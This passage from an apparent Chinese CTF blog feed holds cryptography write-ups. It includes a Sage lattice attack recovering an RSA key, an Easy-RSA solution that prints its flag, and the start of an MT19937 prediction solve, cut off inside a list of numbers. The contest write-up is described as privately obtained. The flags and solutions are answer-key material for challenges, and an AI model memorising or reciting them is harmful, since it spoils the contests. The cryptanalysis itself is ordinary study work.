class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># sage</span><br><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span> *<br><br>c =<br><span class="hljs-number">792534797236942516602405443517723052170140376689765593638997623833</span><br><span class="hljs-number">525502332370366568752423701218537804193723719392319671016105315635</span><br><span class="hljs-number">523406644164531971118370184232962015770416637115765071722283961964</span><br><span class="hljs-number">827115212868237291312609636578368752056498293716848478808131767547</span><br><span class="hljs-number">446308313278458238418750786925588522885746781783147603597170544986</span><br><span class="hljs-number">208068994799423044583975977509062978092895646925325128691641745565</span><br><span class="hljs-number">565104807528491490973536526192938132172849121017114953492710063898</span><br><span class="hljs-number">844399695122256742298334030165735207100449171055079117496974415925</span><br><span class="hljs-number">167478748602909845452507560308635453872490997120605713695943364490</span><br><span class="hljs-number">553428102487682775669613775497156017316624305860430262666205570472</span><br><span class="hljs-number">621762251045983266546589262742077056901761505758616282139860180520</span><br><span class="hljs-number">294114130199610630948384554435331068898512856688812062730461978896</span><br><span class="hljs-number">550717296237834283267302523654274510531108136128918294741736300869</span><br><span class="hljs-number">899449462228229808281574649010180112666932831903406027085633419430</span><br>025271852343210666327353337433569778504453080170055493551867512226<br><span class="hljs-number">748755362216403339448564059716305656384237185703151486523517715746</span><br><span class="hljs-number">219841327983087970570848592955861083128624324922914558382778188473</span><br><span class="hljs-number">508354381883997155444299428898747384287358825771965832858103389182</span><br><span class="hljs-number">2672997846833635917945202914668666249069209</span><br>N =<br><span class="hljs-number">327704199063655154339194866047748377300483661546348646619543042402</span><br><span class="hljs-number">260458534101350044000928583250118734194187256215886625771489682622</span><br><span class="hljs-number">806492392158515139856977282405831771426953889407535449903946471081</span><br><span class="hljs-number">769989651651591222623997395529035591781660724645156930487601579241</span><br><span class="hljs-number">488206427939500937938255588575188735472745545946966631822161787569</span><br><span class="hljs-number">690670592431700668322671046133380934851245111908808167859798212265</span><br><span class="hljs-number">435088714280150547423032692815776965063410936310739819923896759441</span><br><span class="hljs-number">335001874930520763236975226711207654895127866843378461328154795776</span><br><span class="hljs-number">319242290600812698882674645791266238574096744538101900116337068936</span><br><span class="hljs-number">957681128459670057096430909525261047967406584507167977208793797870</span><br><span class="hljs-number">831858199445206260549902066723878612723426168458993576999172766781</span><br><span class="hljs-number">960053959813246897054556640370355234535221471564607870502627719243</span><br><span class="hljs-number">185861171079980645221020435603883953809425799723857745727457620742</span><br><span class="hljs-number">919434348781413514988026742127568571934186958953140598517500511323</span><br>011929458037325804993377002532922851586492715993738894057370890612<br><span class="hljs-number">824581248076082409851337738126905208244299232520865145447167051764</span><br><span class="hljs-number">102587067960512092944943632792165293701233755265831135001570237083</span><br><span class="hljs-number">525408605939160927853199431652266761149838259483979450360702066085</span><br><span class="hljs-number">191758469080084577999970704509262494734276631</span><br><span class="hljs-number">5</span><br>e1 =<br><span class="hljs-number">113093816717144841270493376736752441673022256694148583901036760385</span><br><span class="hljs-number">290294469429291287395932962657459627279948131588586212784590640516</span><br><span class="hljs-number">333875415213429718659370434377813079419901793552309461703882586527</span><br><span class="hljs-number">503420999488191213528380154291270445702806410792319417099800769397</span><br><span class="hljs-number">301837093257916765727595155732721396733301006197816845511287287300</span><br><span class="hljs-number">240373894663383088203656193754454195781571647148298850615901090657</span><br><span class="hljs-number">526494250418115895409707363373152838151538570469978232752856573089</span><br><span class="hljs-number">149548109243765929129792122940993776991512134978235283946198861884</span><br><span class="hljs-number">114007985343254462515565194689101887047325062995222232830812585485</span><br><span class="hljs-number">386335674066695574712424013748788932584416194906037669948036361191</span><br><span class="hljs-number">560447424191340446408227050317480535979753006991332324053550385053</span><br><span class="hljs-number">870295648784077492339350541225982286056281016618014141105366605422</span><br><span class="hljs-number">149895221611592416532345771815704307846206281439784932410973601384</span><br><span class="hljs-number">402414039900782254330313269415078960064305344681778478762050176778</span><br><span class="hljs-number">461863907418405687378915582516510150832198276943089812715818203025</span><br><span class="hljs-number">913800315465878924192853193803827276622946514235810979197716378589</span><br><span class="hljs-number">261982901063684489176009723390727783448898996904743318965120718829</span><br><span class="hljs-number">513279206531437783722261301609689797505310206968838386508504975439</span><br><span class="hljs-number">758618002450017650730285740872724819939789165</span><br><span class="hljs-number">6</span><br>e2 =<br><span class="hljs-number">520784802242233176685694625439335648020233315036318660607609058232</span><br><span class="hljs-number">253756893711940811689671211031740538418030746960229830407033429274</span><br><span class="hljs-number">724173761594060357040912794702362534613844927042210511917607360605</span><br><span class="hljs-number">543444697905470318310052804430718259068491360683455456766060272908</span><br><span class="hljs-number">336208271643139931316184313237522767343589523009450774630417666521</span><br><span class="hljs-number">249374919345775996757611711031293044212158686999046988150214592108</span><br><span class="hljs-number">157111459059701972034578216909910625389552085786113690770133454547</span><br><span class="hljs-number">457764623704458887788524087623286723476033810982968611147489646670</span><br><span class="hljs-number">169496808853835334718258960849680027392565778520201820536838989790</span><br><span class="hljs-number">882852419430752827631200573362834437858845826550336938550475796906</span><br><span class="hljs-number">207139877232034439683439393971802337498729658644929705383526075801</span><br><span class="hljs-number">274333885777281973827854475388302632779455717147494603818517391466</span><br><span class="hljs-number">719503054220543434394727883299649591903578031268240738900411112406</span><br><span class="hljs-number">618652725850847223731909368279406071589358172777730956937781876825</span><br><span class="hljs-number">949576871569149291236837622348525849820772458720098637391873811567</span><br><span class="hljs-number">556867266331105515676590090610339970832411635514893234739688540601</span><br>082980853279295821658846621558746399768293470665616360020175164850<br>074194164460647394129842296631518274348500179159711083883316628656<br><span class="hljs-number">10040555809970494140145365617095067391830661</span><br>a = <span class="hljs-number">0.198</span> <span class="hljs-comment"># 811./4097</span><br>M1 = N**<span class="hljs-number">0.5</span><br>M2 = N**(a + <span class="hljs-number">1</span>)<br>D = diagonal_matrix(ZZ, [N, M1, M2, <span class="hljs-number">1</span>])<br>M = matrix(ZZ, [[<span class="hljs-number">1</span>, -N, <span class="hljs-number">0</span>, N**<span class="hljs-number">2</span>], [<span class="hljs-number">0</span>, e1, -e1, -e1 * N], [<span class="hljs-number">0</span>, <span class="hljs-number">0</span>,<br>e2, -e2 * N],<br> [<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, e1 * e2]]) * D<br>L = M.LLL()<br>t = vector(ZZ, L[<span class="hljs-number">0</span>])<br>x = t * M**(-<span class="hljs-number">1</span>)<br>phi = <span class="hljs-built_in">int</span>(x[<span class="hljs-number">1</span>] / x[<span class="hljs-number">0</span>] * e1)<br>d = inverse(<span class="hljs-number">0x10001</span>, phi)<br>m = <span class="hljs-built_in">pow</span>(c, d, N)<br><span class="hljs-built_in">print</span>(long_to_bytes(m))<br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>CTF</category>
</categories>
</entry>
<entry>
<title>第六届“楚慧杯”官方Write-up</title>
<link href="/2021/12/07/%E7%AC%AC%E5%85%AD%E5%B1%8A%E2%80%9C%E6%A5%9A%E6%85%A7%E6%9D%AF%E2%80%9D%E5%AE%98%E6%96%B9Write-up/"/>
<url>/2021/12/07/%E7%AC%AC%E5%85%AD%E5%B1%8A%E2%80%9C%E6%A5%9A%E6%85%A7%E6%9D%AF%E2%80%9D%E5%AE%98%E6%96%B9Write-up/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>由于本次比赛承办方是我校,所以在本人和信安协会会长的py交易后,顺利拿到了本次比赛的wp。未经本人授权,禁止转载和发布!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h3><h4 id="Easy-RSA"><a href="#Easy-RSA" class="headerlink" title="Easy-RSA"></a>Easy-RSA</h4><p>sympy解方程一把梭</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> sympy <span class="hljs-keyword">import</span> Symbol, solve<br><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><br>n = <span class="hljs-number">27552304606229034903366058815849954030287648695063385362955432137790872571412035824128918674719247737295565001575991597519270789776408208970323808016733976338433371328100880898942106515627607388226912870981180215883273805491209461671730377099185278711453949265641966582563910708529619185885928310168288810488784242368160743359666583499117949407921812317700250240067929572558785431071173411100434109661677786734923283679392823901052633992456780285091988542875991410528415886437666510014123352497264017734716859350294159440761760921548702546470902740121962033241003215821780125194400741190925169397917247376657863011603</span><br>e = <span class="hljs-number">65537</span><br>c = <span class="hljs-number">8643831704675414121804983915084443744489969712473300784256427784417167322852556975560503484179280700293119974607254037642425650493676448134024809335297135239994950178868535219541095694358323044214971760829173918774094415933808417722001811285178546917655837402000771685507972240389565704149610032767242977174132826100177368764169367458684152505611469248099487912367364804360878611296860803835816266114046682291529593099394952245852157119233687981777202751472502060481232341206366584532964027749320641690448228420342308891797513656897566100268729012788419021059054907653832828437666012596894150751431936476816983845357</span><br>s = <span class="hljs-number">3216514606297172806828066063738105740383963382396892688569683235383985567043193404185955880509592930874764682428425994713750665248099953457550673860782324431970917492727256948066013701406000049963109681898567026552657377599263519201715733179565306750754520746601394738797021362510415215113118083969304423858</span><br><span class="hljs-comment"># p = Symbol('p')</span><br><span class="hljs-comment"># q = Symbol('q')</span><br><span class="hljs-comment"># p, q = solve([p*q-n, p-q-s], [p,q])</span><br><span class="hljs-comment"># print(p,q)</span><br>p = <span class="hljs-number">167604917202624171205562332547086795459018271995531662202392816766661852499967774267554085060619750182533064588995245441659492248123164548905239665224600839192261379211031757557080502863539123811164713057605073461933854926502162793803096063035806777877263036653498763650955936640215477205393488552237210705691</span><br>q = <span class="hljs-number">164388402596326998398734266483348689718634308613134769513823133531277866932924580863368129180110157251658299906566819446945741582875064595447688991363818514760290461718304500609014489162133123761201603375706506435381197548902899274601380329856241471126508515906897368912158915277705061990280370468267906281833</span><br>d = invert(e, (p-<span class="hljs-number">1</span>)*(q-<span class="hljs-number">1</span>))<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">pow</span>(c,d,n))))<br><span class="hljs-comment"># b'flag{9c0532a253809f180747b6da334b438f}'</span><br></code></pre></td></tr></table></figure><h4 id="EasyRandom"><a href="#EasyRandom" class="headerlink" title="EasyRandom"></a>EasyRandom</h4><p>先用MT19937伪随机数预测出两个异或的数。因为tmp是urandom(3),还给了sha256的结果,所以可以通过爆破得到tmp的值。异或之后得到(n1<<64)+(n2<<40)+n3的值,又根据位数可知正好错开了。取二进制的低40位为n3,爆破一下仿射密码得到flag16进制的最后十位。取中间一段为n2,和tmp异或一下得到flag16进制的中间6位。取前面一段异或一下得到flag16进制的前32位。把三部分拼起来再n2s得到最后的flag。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><code class="hljs python">randist=[<span class="hljs-number">3693014292</span>, <span class="hljs-number">1999090277</span>, <span class="hljs-number">2812362804</span>, <span class="hljs-number">2118249952</span>, <span class="hljs-number">885988212</span>, <span class="hljs-number">1131999143</span>, <span class="hljs-number">3327925205</span>, <span class="hljs-number">731275596</span>, <span class="hljs-number">1818780432</span>, <span class="hljs-number">644434032</span>, <span class="hljs-number">3301077903</span>, <span class="hljs-number">1004325730</span>, <span class="hljs-number">113617890</span>, <span class="hljs-number">262927352</span>, <span class="hljs-number">1449581419</span>, <span class="hljs-number">1596910105</span>, <span class="hljs-number">3680959953</span>, <span class="hljs-number">4039323321</span>, <span class="hljs-number">2422810127</span>, <span class="hljs-number">946521915</span>, <span class="hljs-number">4049336142</span>, <span class="hljs-number">1299247828</span>, <span class="hljs-number">3361233447</span>, <span class="hljs-number">1319347681</span>, <span class="hljs-number">2858084207</span>, <span class="hljs-number">2493466845</span>, <span class="hljs-number">522894151</span>, <span class="hljs-number">3272590535</span>, <span class="hljs-number">2518746559</span>, <span class="hljs-number">113976089</span>, <span class="hljs-number">1912521614</span>, <span class="hljs-number">1971657011</span>, <span class="hljs-number">4052443472</span>, <span class="hljs-number">1928327357</span>, <span class="hljs-number">1481517158</span>, <span class="hljs-number">1707968618</span>, <span class="hljs-number">3946904293</span>, <span class="hljs-number">3941277234</span>, <span class="hljs-number">1740669853</span>, <span class="hljs-number">177473759</span>, <span class="hljs-number">2855945159</span>, <span class="hljs-number">3217808064</span>, <span class="hljs-number">568887441</span>, <span class="hljs-number">2243547768</span>, <span class="hljs-number">533475147</span>, <span class="hljs-number">4005163087</span>, <span class="hljs-number">1991762580</span>, <span class="hljs-number">1175403787</span>, <span class="hljs-number">1819485104</span>, <span class="hljs-number">4162426193</span>, <span class="hljs-number">2480060730</span>, <span class="hljs-number">1889558541</span>, <span class="hljs-number">1659122908</span>, <span class="hljs-number">2343813603</span>, <span class="hljs-number">1792751594</span>, <span class="hljs-number">3287109162</span>, <span class="hljs-number">4119020356</span>, <span class="hljs-number">2086904766</span>, <span class="hljs-number">4227102603</span>, <span class="hljs-number">4251617926</span>, <span class="hljs-number">386544361</span>, <span class="hljs-number">2024596798</span>, <span class="hljs-number">3275172220</span>, <span class="hljs-number">1652143183</span>, <span class="hljs-number">4279693598</span>, <span class="hljs-number">1741714555</span>, <span class="hljs-number">3920640884</span>, <span class="hljs-number">837190820</span>, <span class="hljs-number">4242688797</span>, <span class="hljs-number">3406136725</span>, <span class="hljs-number">272163458</span>, <span class="hljs-number">1933729342</span>, <span class="hljs-number">3348914742</span>, <span class="hljs-number">3483202044</span>, <span class="hljs-number">313505665</span>, <span class="hljs-number">3180958891</span>, <span class="hljs-number">276638359</span>, <span class="hljs-number">2247257889</span>, <span class="hljs-number">1283002827</span>, <span class="hljs-number">253470155</span>, <span class="hljs-number">2172073971</span>, <span class="hljs-number">3333335918</span>, <span class="hljs-number">321125332</span>, <span class="hljs-number">3478202657</span>, <span class="hljs-number">1298557332</span>, <span class="hljs-number">1255183068</span>, <span class="hljs-number">2347216752</span>, <span class="hljs-number">1823003608</span>, <span class="hljs-number">1873938039</span>, <span class="hljs-number">4172493668</span>, <span class="hljs-number">1252876713</span>, <span class="hljs-number">2877329304</span>, <span class="hljs-number">2733470437</span>, <span class="hljs-number">743814046</span>, <span class="hljs-number">1482554102</span>, <span class="hljs-number">3967801003</span>, <span class="hljs-number">4135521914</span>, <span class="hljs-number">1601509876</span>, <span class="hljs-number">1370623470</span>, <span class="hljs-number">564556001</span>, <span class="hljs-number">3369378190</span>, <span class="hljs-number">1930652933</span>, <span class="hljs-number">2684027015</span>, <span class="hljs-number">730072119</span>, <span class="hljs-number">3133537560</span>, <span class="hljs-number">554522157</span>, <span class="hljs-number">4200260396</span>, <span class="hljs-number">66286223</span>, <span class="hljs-number">2856462351</span>, <span class="hljs-number">3409097597</span>, <span class="hljs-number">1123352314</span>, <span class="hljs-number">3112249875</span>, <span class="hljs-number">660537433</span>, <span class="hljs-number">1027164908</span>, <span class="hljs-number">2875953843</span>, <span class="hljs-number">3419766147</span>, <span class="hljs-number">64818752</span>, <span class="hljs-number">1572659846</span>, <span class="hljs-number">176068922</span>, <span class="hljs-number">2155262681</span>, <span class="hljs-number">3154282688</span>, <span class="hljs-number">3215591301</span>, <span class="hljs-number">923444143</span>, <span class="hljs-number">54743986</span>, <span class="hljs-number">3011602372</span>, <span class="hljs-number">1936525684</span>, <span class="hljs-number">2636863705</span>, <span class="hljs-number">3228231549</span>, <span class="hljs-number">3660514246</span>, <span class="hljs-number">2503374986</span>, <span class="hljs-number">1180875896</span>, <span class="hljs-number">941948277</span>, <span class="hljs-number">1922552596</span>, <span class="hljs-number">740696852</span>, <span class="hljs-number">2337729160</span>, <span class="hljs-number">1636823570</span>, <span class="hljs-number">1788245610</span>, <span class="hljs-number">2970204367</span>, <span class="hljs-number">1597424641</span>, <span class="hljs-number">3940594526</span>, <span class="hljs-number">846332502</span>, <span class="hljs-number">3177694219</span>, <span class="hljs-number">1253960959</span>, <span class="hljs-number">1980517147</span>, <span class="hljs-number">2066843131</span>, <span class="hljs-number">3452017677</span>, <span class="hljs-number">743662084</span>, <span class="hljs-number">3332614739</span>, <span class="hljs-number">1230416894</span>, <span class="hljs-number">1790783329</span>, <span class="hljs-number">3339256849</span>, <span class="hljs-number">1223003548</span>, <span class="hljs-number">3155010716</span>, <span class="hljs-number">211801309</span>, <span class="hljs-number">3302823875</span>, <span class="hljs-number">2203405123</span>, <span class="hljs-number">4027118331</span>, <span class="hljs-number">3928670766</span>, <span class="hljs-number">1551556760</span>, <span class="hljs-number">2018355543</span>, <span class="hljs-number">2473765725</span>, <span class="hljs-number">2451139992</span>, <span class="hljs-number">3923372144</span>, <span class="hljs-number">2197282188</span>, <span class="hljs-number">2056399604</span>, <span class="hljs-number">1294675076</span>, <span class="hljs-number">1121984516</span>, <span class="hljs-number">113881691</span>, <span class="hljs-number">1646921221</span>, <span class="hljs-number">3151728031</span>, <span class="hljs-number">695534775</span>, <span class="hljs-number">3870352246</span>, <span class="hljs-number">1614457851</span>, <span class="hljs-number">1764207471</span>, <span class="hljs-number">3516853329</span>, <span class="hljs-number">3276173646</span>, <span class="hljs-number">3559299512</span>, <span class="hljs-number">1239291648</span>, <span class="hljs-number">2417317314</span>, <span class="hljs-number">908861203</span>, <span class="hljs-number">3945977517</span>, <span class="hljs-number">1789725976</span>, <span class="hljs-number">1094256533</span>, <span class="hljs-number">1194981603</span>, <span class="hljs-number">3817224425</span>, <span class="hljs-number">4294621339</span>, <span class="hljs-number">3041360046</span>, <span class="hljs-number">1319794040</span>, <span class="hljs-number">1881403289</span>, <span class="hljs-number">151945988</span>, <span class="hljs-number">3036988698</span>, <span class="hljs-number">2214811128</span>, <span class="hljs-number">240957157</span>, <span class="hljs-number">509921068</span>, <span class="hljs-number">1538884056</span>, <span class="hljs-number">119208760</span>, <span class="hljs-number">1425862614</span>, <span class="hljs-number">2923918837</span>, <span class="hljs-number">845827337</span>, <span class="hljs-number">507023267</span>, <span class="hljs-number">2955299274</span>, <span class="hljs-number">1247972138</span>, <span class="hljs-number">766611587</span>, <span class="hljs-number">2012831811</span>, <span class="hljs-number">3441161631</span>, <span class="hljs-number">2645633381</span>, <span class="hljs-number">2328705244</span>, <span class="hljs-number">512481283</span>, <span class="hljs-number">461960350</span>, <span class="hljs-number">1704754200</span>, <span class="hljs-number">1327914555</span>, <span class="hljs-number">147555684</span>, <span class="hljs-number">3349647800</span>, <span class="hljs-number">3062151439</span>, <span class="hljs-number">3090502250</span>, <span class="hljs-number">937966533</span>, <span class="hljs-number">82567652</span>, <span class="hljs-number">725403325</span>, <span class="hljs-number">4001427888</span>, <span class="hljs-number">524069543</span>, <span class="hljs-number">2291211027</span>, <span class="hljs-number">2084465414</span>, <span class="hljs-number">1292961088</span>, <span class="hljs-number">4278389999</span>, <span class="hljs-number">1309916992</span>, <span class="hljs-number">3249380344</span>, <span class="hljs-number">3493113838</span>, <span class="hljs-number">83526738</span>, <span class="hljs-number">4193860366</span>, <span class="hljs-number">2438456426</span>, <span class="hljs-number">3510215857</span>, <span class="hljs-number">175761668</span>, <span class="hljs-number">2820499306</span>, <span class="hljs-number">1792194251</span>, <span class="hljs-number">1225332544</span>, <span class="hljs-number">3896268058</span>, <span class="hljs-number">2752286952</span>, <span class="hljs-number">3182785082</span>, <span class="hljs-number">956435024</span>, <span class="hljs-number">3996152048</span>, <span class="hljs-number">2924148655</span>, <span class="hljs-number">2895936126</span>, <span class="hljs-number">1856977607</span>, <span class="hljs-number">1289267397</span>, <span class="hljs-number">690722358</span>, <span class="hljs-number">1937429718</span>, <span class="hljs-number">1531967867</span>, <span class="hljs-number">2098208046</span>, <span class="hljs-number">1815108525</span>, <span class="hljs-number">1567735201</span>, <span class="hljs-number">146084074</span>, <span class="hljs-number">2093897143</span>, <span class="hljs-number">2793246617</span>, <span class="hljs-number">1146380003</span>, <span class="hljs-number">2523936201</span>, <span class="hljs-number">2301399576</span>, <span class="hljs-number">2052473947</span>, <span class="hljs-number">3470101770</span>, <span class="hljs-number">3722302451</span>, <span class="hljs-number">3345343326</span>, <span class="hljs-number">2271545308</span>, <span class="hljs-number">2657475692</span>, <span class="hljs-number">2211989611</span>, <span class="hljs-number">2428885922</span>, <span class="hljs-number">2097052181</span>, <span class="hljs-number">3554955904</span>, <span class="hljs-number">1704837589</span>, <span class="hljs-number">1494941216</span>, <span class="hljs-number">3403108634</span>, <span class="hljs-number">911409695</span>, <span class="hljs-number">3550042769</span>, <span class="hljs-number">379101531</span>, <span class="hljs-number">406655201</span>, <span class="hljs-number">1317011271</span>, <span class="hljs-number">2336674904</span>, <span class="hljs-number">3930303124</span>, <span class="hljs-number">3038552846</span>, <span class="hljs-number">3207659329</span>, <span class="hljs-number">2785076651</span>, <span class="hljs-number">1203119790</span>, <span class="hljs-number">1146774748</span>, <span class="hljs-number">2218279443</span>, <span class="hljs-number">494710315</span>, <span class="hljs-number">3507507044</span>, <span class="hljs-number">922439915</span>, <span class="hljs-number">35699688</span>, <span class="hljs-number">2690622469</span>, <span class="hljs-number">1458912003</span>, <span class="hljs-number">3911367650</span>, <span class="hljs-number">983115567</span>, <span class="hljs-number">2813252332</span>, <span class="hljs-number">839947939</span>, <span class="hljs-number">514499603</span>, <span class="hljs-number">3894529528</span>, <span class="hljs-number">326817358</span>, <span class="hljs-number">1479783722</span>, <span class="hljs-number">4242051909</span>, <span class="hljs-number">3492972915</span>, <span class="hljs-number">3473946915</span>, <span class="hljs-number">3348053727</span>, <span class="hljs-number">3681386488</span>, <span class="hljs-number">584266203</span>, <span class="hljs-number">3531080708</span>, <span class="hljs-number">3262223061</span>, <span class="hljs-number">2904040234</span>, <span class="hljs-number">3897643811</span>, <span class="hljs-number">2706405422</span>, <span class="hljs-number">914107260</span>, <span class="hljs-number">3011659451</span>, <span class="hljs-number">308811435</span>, <span class="hljs-number">4103121550</span>, <span class="hljs-number">4023430755</span>, <span class="hljs-number">2975129044</span>, <span class="hljs-number">4139500620</span>, <span class="hljs-number">1763891748</span>, <span class="hljs-number">57665971</span>, <span class="hljs-number">3149249501</span>, <span class="hljs-number">870034516</span>, <span class="hljs-number">4142837134</span>, <span class="hljs-number">3130156432</span>, <span class="hljs-number">1708266697</span>, <span class="hljs-number">1242161643</span>, <span class="hljs-number">1163332264</span>, <span class="hljs-number">108174709</span>, <span class="hljs-number">1633896347</span>, <span class="hljs-number">2820171620</span>, <span class="hljs-number">1708875131</span>, <span class="hljs-number">724124719</span>, <span class="hljs-number">3562786877</span>, <span class="hljs-number">518616285</span>, <span class="hljs-number">3643662732</span>, <span class="hljs-number">3375737681</span>, <span class="hljs-number">2550728441</span>, <span class="hljs-number">1823319080</span>, <span class="hljs-number">1775922455</span>, <span class="hljs-number">3838709569</span>, <span class="hljs-number">177763087</span>, <span class="hljs-number">946611206</span>, <span class="hljs-number">4054832304</span>, <span class="hljs-number">1473954380</span>, <span class="hljs-number">3475817789</span>, <span class="hljs-number">2590152780</span>, <span class="hljs-number">3587873907</span>, <span class="hljs-number">3437231816</span>, <span class="hljs-number">2708036272</span>, <span class="hljs-number">3883447173</span>, <span class="hljs-number">655291275</span>, <span class="hljs-number">707049339</span>, <span class="hljs-number">1352718730</span>, <span class="hljs-number">3543000675</span>, <span class="hljs-number">962283943</span>, <span class="hljs-number">4170075509</span>, <span class="hljs-number">1897499376</span>, <span class="hljs-number">643615933</span>, <span class="hljs-number">856277089</span>, <span class="hljs-number">3299581344</span>, <span class="hljs-number">4093601146</span>, <span class="hljs-number">2638625975</span>, <span class="hljs-number">1563647962</span>, <span class="hljs-number">890552183</span>, <span class="hljs-number">3138216177</span>, <span class="hljs-number">222946344</span>, <span class="hljs-number">4219020514</span>, <span class="hljs-number">3218803481</span>, <span class="hljs-number">3093722090</span>, <span class="hljs-number">1210144957</span>, <span class="hljs-number">3499543439</span>, <span class="hljs-number">4239553976</span>, <span class="hljs-number">3582176749</span>, <span class="hljs-number">654186756</span>, <span class="hljs-number">3005601303</span>, <span class="hljs-number">1252241368</span>, <span class="hljs-number">2459425960</span>, <span class="hljs-number">3587113096</span>, <span class="hljs-number">3506651695</span>, <span class="hljs-number">3673557784</span>, <span class="hljs-number">4157576483</span>, <span class="hljs-number">733173716</span>, <span class="hljs-number">1505997631</span>, <span class="hljs-number">394626148</span>, <span class="hljs-number">1322270695</span>, <span class="hljs-number">84604461</span>, <span class="hljs-number">891267254</span>, <span class="hljs-number">518241635</span>, <span class="hljs-number">1068682198</span>, <span class="hljs-number">3696554893</span>, <span class="hljs-number">3111393676</span>, <span class="hljs-number">1398539042</span>, <span class="hljs-number">901276151</span>, <span class="hljs-number">483471144</span>, <span class="hljs-number">1952219546</span>, <span class="hljs-number">2884270239</span>, <span class="hljs-number">2215979688</span>, <span class="hljs-number">4138748504</span>, <span class="hljs-number">1623101775</span>, <span class="hljs-number">3102260771</span>, <span class="hljs-number">4276348310</span>, <span class="hljs-number">1228132323</span>, <span class="hljs-number">2250922664</span>, <span class="hljs-number">833982365</span>, <span class="hljs-number">3402246096</span>, <span class="hljs-number">2085678412</span>, <span class="hljs-number">2707953187</span>, <span class="hljs-number">590837194</span>, <span class="hljs-number">3421635592</span>, <span class="hljs-number">3488064851</span>, <span class="hljs-number">3655525766</span>, <span class="hljs-number">1029679348</span>, <span class="hljs-number">2448841196</span>, <span class="hljs-number">89284911</span>, <span class="hljs-number">3970560858</span>, <span class="hljs-number">334986490</span>, <span class="hljs-number">3063032848</span>, <span class="hljs-number">3172506167</span>, <span class="hljs-number">2391313449</span>, <span class="hljs-number">3589023591</span>, <span class="hljs-number">4269870234</span>, <span class="hljs-number">3275101066</span>, <span class="hljs-number">1716650872</span>, <span class="hljs-number">483502324</span>, <span class="hljs-number">2116979028</span>, <span class="hljs-number">815078501</span>, <span class="hljs-number">3475316209</span>, <span class="hljs-number">1003463022</span>, <span class="hljs-number">2418993968</span>, <span class="hljs-number">4251101825</span>, <span class="hljs-number">346290993</span>, <span class="hljs-number">3286645593</span>, <span class="hljs-number">2654742976</span>, <span class="hljs-number">99974317</span>, <span class="hljs-number">4124695845</span>, <span class="hljs-number">3732280507</span>, <span class="hljs-number">1536249568</span>, <span class="hljs-number">1440486445</span>, <span class="hljs-number">1605422491</span>, <span class="hljs-number">393607563</span>, <span class="hljs-number">1141210694</span>, <span class="hljs-number">43848150</span>, <span class="hljs-number">1656624711</span>, <span class="hljs-number">2170355702</span>, <span class="hljs-number">327988021</span>, <span class="hljs-number">974870171</span>, <span class="hljs-number">2169013815</span>, <span class="hljs-number">3689546490</span>, <span class="hljs-number">3576028106</span>, <span class="hljs-number">4258679518</span>, <span class="hljs-number">14944446</span>, <span 